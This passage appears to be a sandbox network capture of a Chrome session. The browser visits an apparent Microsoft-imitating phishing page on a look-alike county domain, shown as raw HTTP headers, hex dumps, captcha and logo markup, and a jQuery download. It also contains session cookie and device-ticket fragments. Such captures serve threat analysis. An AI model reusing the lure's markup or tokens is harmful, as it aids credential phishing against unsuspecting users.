                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7b8590f0cbe-EWR
                                                                          2024-10-01 22:42:45 UTC1369INData Raw: 66 61 61 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 74 72 61 6e 73 6c 61 74 65 3d 22 6e 6f 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d
                                                                          Data Ascii: faa<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" translate="no" lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="pragma" content="no-cache"> <meta nam
                                                                          2024-10-01 22:42:45 UTC1369INData Raw: 20 3c 64 69 76 20 69 64 3d 22 63 61 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 31 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 32 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 33 22
                                                                          Data Ascii: <div id="cal"> <div class="t"></div> <div class="r"> <div class="s s1"></div> <div class="s s2"></div> <div class="s s3"
                                                                          2024-10-01 22:42:45 UTC1279INData Raw: 69 64 64 65 6e 22 20 69 64 3d 22 62 6c 74 64 64 61 74 61 22 20 6e 61 6d 65 3d 22 62 6c 74 64 64 61 74 61 22 20 76 61 6c 75 65 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 63 61 70 74 63 68 61 2f 6c 6f 67 6f 2e 73 76 67 22 20 69 64 3d 22 4d 53 4c 6f 67 6f 22 3e 20 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 63 66 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34
                                                                          Data Ascii: idden" id="bltddata" name="bltddata" value=""> </form> </div> </div> <img src="./captcha/logo.svg" id="MSLogo"> </div> <script> turnstile.render('#cf', { sitekey: '0x4
                                                                          2024-10-01 22:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          2192.168.2.64971940.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:45 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 4d 4d 64 73 67 71 2f 2f 45 4f 44 45 49 42 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 39 31 62 36 32 30 34 62 62 39 61 33 38 66 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: cMMdsgq//EODEIBu.1Context: 6e91b6204bb9a38f
                                                                          2024-10-01 22:42:45 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2024-10-01 22:42:45 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 4d 4d 64 73 67 71 2f 2f 45 4f 44 45 49 42 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 39 31 62 36 32 30 34 62 62 39 61 33 38 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 49 64 52 72 6a 6e 62 75 76 56 6b 53 7a 33 56 4c 71 52 63 4c 4c 39 73 4f 38 46 6e 4c 6f 47 49 45 33 6e 52 79 66 39 34 55 4a 63 32 2f 62 65 30 75 34 6b 6d 66 30 6c 47 5a 4d 58 2b 35 59 55 48 45 78 62 4c 6f 59 6d 65 50 78 44 7a 4a 55 2b 57 34 54 42 57 68 2f 2f 56 57 72 35 71 48 67 65 6b 33 6d 57 37 6e 6a 45 34 54 6c 62 50 77
                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cMMdsgq//EODEIBu.2Context: 6e91b6204bb9a38f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbIdRrjnbuvVkSz3VLqRcLL9sO8FnLoGIE3nRyf94UJc2/be0u4kmf0lGZMX+5YUHExbLoYmePxDzJU+W4TBWh//VWr5qHgek3mW7njE4TlbPw
                                                                          2024-10-01 22:42:45 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 4d 4d 64 73 67 71 2f 2f 45 4f 44 45 49 42 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 39 31 62 36 32 30 34 62 62 39 61 33 38 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: cMMdsgq//EODEIBu.3Context: 6e91b6204bb9a38f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2024-10-01 22:42:45 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2024-10-01 22:42:45 UTC58INData Raw: 4d 53 2d 43 56 3a 20 53 45 58 63 6f 47 6f 71 62 6b 79 50 65 38 74 32 6c 51 58 36 71 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: SEXcoGoqbkyPe8t2lQX6qw.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649717104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:46 UTC640OUTGET /captcha/style.css HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:42:46 UTC663INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:46 GMT
                                                                          Content-Type: text/css
                                                                          Content-Length: 4210
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Cache-Control: max-age=14400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 3327
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WtDSvHFDPqonHvcK1bLB4eT1uQRQBg2MvPwvXF%2BCAMcIucz0lV%2BJibF6PbJq21j4YID6sznbLSv4vC6Xp2%2FjiOZpxrQe4jEXzUh%2BKgRNBv5Ibh1GMHf3mkMUSAp8%2Fj5ExIGUTgkZE%2B1Eihh7%2BrVtBwk4EJIyTAQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7c00e823300-EWR
                                                                          2024-10-01 22:42:46 UTC706INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 46 61 62 72 69 63 4d 44 4c 32 49 63 6f 6e 73 3b 73 72 63 3a 75 72 6c 28 27 2f 2f 72 65 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 6f 77 61 6d 61 69 6c 2f 32 30 32 34 30 33 30 38 30 30 33 2e 30 39 2f 72 65 73 6f 75 72 63 65 73 2f 66 6f 6e 74 73 2f 6f 33 36 35 69 63 6f 6e 73 2d 6d 64 6c 32 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6f 66 66 69 63 65 33 36 35 69 63 6f 6e 73 3b 73 72 63 3a 75 72 6c 28 27 2f 2f 72 65 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 6f 77 61 6d 61 69 6c 2f
                                                                          Data Ascii: @font-face{font-family:FabricMDL2Icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/o365icons-mdl2.woff') format('woff');font-weight:400;font-style:normal}@font-face{font-family:office365icons;src:url('//res.cdn.office.net/owamail/
                                                                          2024-10-01 22:42:46 UTC1369INData Raw: 2d 65 6e 76 57 3a 31 33 30 70 78 3b 2d 2d 65 6e 76 48 3a 37 31 70 78 3b 2d 2d 63 61 6c 57 3a 31 31 38 70 78 3b 2d 2d 73 71 57 3a 63 61 6c 63 28 76 61 72 28 2d 2d 63 61 6c 57 29 20 2f 20 33 29 3b 2d 2d 73 71 48 3a 33 37 70 78 3b 2d 2d 63 61 6c 48 48 3a 32 30 70 78 3b 2d 2d 63 61 6c 48 3a 63 61 6c 63 28 76 61 72 28 2d 2d 73 71 48 29 20 2a 20 33 20 2b 20 76 61 72 28 2d 2d 63 61 6c 48 48 29 29 3b 2d 2d 63 61 6c 59 3a 63 61 6c 63 28 76 61 72 28 2d 2d 63 61 6c 48 29 20 2b 20 32 30 70 78 29 3b 2d 2d 63 61 6c 59 45 78 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 63 61 6c 48 29 20 2d 20 38 30 70 78 29 3b 2d 2d 63 61 6c 59 4f 76 65 72 45 78 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 63 61 6c 48 29 20 2d 20 39 32 70 78 29 3b 2d 2d 66 6c 61 70 53 3a 39 36 70 78 3b 2d 2d 66 6c
                                                                          Data Ascii: -envW:130px;--envH:71px;--calW:118px;--sqW:calc(var(--calW) / 3);--sqH:37px;--calHH:20px;--calH:calc(var(--sqH) * 3 + var(--calHH));--calY:calc(var(--calH) + 20px);--calYExt:calc(var(--calH) - 80px);--calYOverExt:calc(var(--calH) - 92px);--flapS:96px;--fl
                                                                          2024-10-01 22:42:46 UTC1369INData Raw: 2d 63 61 6c 48 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 30 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 63 61 6c 2d 62 6f 75 6e 63 65 20 76 61 72 28 2d 2d 64 75 72 29 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2e 35 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 76 61 72 28 2d 2d 63 61 6c 59 45 78 74 29 29 20 73 63 61 6c 65 59 28 31 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 7b 30 25 2c 31 30 30 25 2c 31 36 2e 35 25 2c 37 36 2e 31 25 7b 74 72
                                                                          Data Ascii: -calH);border-radius:7px;overflow:hidden;margin:0 auto;margin-top:-306px;animation:cal-bounce var(--dur) infinite;animation-timing-function:cubic-bezier(0,0.5,0,1);transform:translateY(var(--calYExt)) scaleY(1)}@keyframes cal-bounce{0%,100%,16.5%,76.1%{tr
                                                                          2024-10-01 22:42:46 UTC766INData Raw: 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 30 2c 30 2e 36 37 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 39 30 64 65 67 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 7b 30 25 2c 31 30 30 25 2c 37 37 25 2c 38 2e 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 30 29 7d 31 34 2e 35 25 2c 37 36 25 7b 74 72 61 6e 73 66
                                                                          Data Ascii: ming-function:cubic-bezier(0.32,0,0.67,0);transform-origin:top;transform:translateY(calc(-1 * var(--envH))) rotate3d(1,0,0,90deg)}@keyframes closed-flap-swing{0%,100%,77%,8.5%{transform:translateY(calc(-1 * var(--envH))) rotate3d(1,0,0,0)}14.5%,76%{transf


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649722151.101.2.1374434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:46 UTC554OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:47 UTC614INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 89501
                                                                          Server: nginx
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                          ETag: "28feccc0-15d9d"
                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 01 Oct 2024 22:42:47 GMT
                                                                          Age: 4014349
                                                                          X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890079-NYC
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 55, 1394
                                                                          X-Timer: S1727822567.032151,VS0,VE0
                                                                          Vary: Accept-Encoding
                                                                          2024-10-01 22:42:47 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2024-10-01 22:42:47 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                          2024-10-01 22:42:47 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                          2024-10-01 22:42:47 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                          2024-10-01 22:42:47 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                          2024-10-01 22:42:47 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
